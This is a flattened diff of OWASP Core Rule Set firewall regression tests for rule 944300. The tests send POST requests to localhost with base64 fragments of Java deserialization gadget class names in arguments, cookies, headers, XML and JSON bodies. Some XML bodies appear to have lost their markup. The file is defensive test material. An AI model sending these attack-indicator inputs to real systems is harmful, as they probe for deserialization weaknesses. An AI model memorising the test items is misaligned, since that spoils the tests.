Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnN0YW50aWF0ZWZhY3Rvcnk + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + 
log_contains: "id \"944300\"" + - test_id: 158 desc: "Cookie name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BpbnN0YW50aWF0ZWZhY3Rvcnk=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-159 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnN0YW50aWF0ZWZhY3Rvcnk=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 159 desc: "Request header test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BpbnN0YW50aWF0ZWZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-160 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnN0YW50aWF0ZWZhY3Rvcnk + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 160 desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-161 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 161 desc: "XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 
944300-162 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_id: 162 desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-163 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_id: 163 desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: 
"/post" - version: "HTTP/1.0" - data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-164 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_id: 164 desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"BpbnN0YW50aWF0ZWZhY3Rvcnk\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-165 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnN0YW50aWF0ZWZhY3Rvcnk\"}" + output: + log_contains: "id \"944300\"" + - test_id: 165 desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"BpbnN0YW50aWF0ZWZhY3Rvcnk\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-166 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"BpbnN0YW50aWF0ZWZhY3Rvcnk\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 166 desc: "Argument test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-167 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_id: 167 desc: 
"Argument name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-168 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test" + output: + log_contains: "id \"944300\"" + - test_id: 168 desc: "Cookie test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-169 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 169 desc: "Cookie name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-170 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 170 desc: "Request header test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - 
log_contains: "id \"944300\"" - - test_title: 944300-171 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 171 desc: "XML attribute value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-172 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 172 desc: "XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-173 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_id: 173 desc: "Nested XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-174 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_id: 174 desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-175 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_id: 175 desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-176 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\"}" + output: + log_contains: "id \"944300\"" + - test_id: 176 desc: 
"Content-Type application/json arg name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-177 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 177 desc: "Argument test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-178 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_id: 178 desc: "Argument name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-179 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test" + output: + log_contains: "id \"944300\"" + - test_id: 179 desc: "Cookie test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-180 + - input: + 
dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 180 desc: "Cookie name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-181 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 181 desc: "Request header test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-182 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 182 desc: "XML attribute value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-183 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 183 desc: "XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - 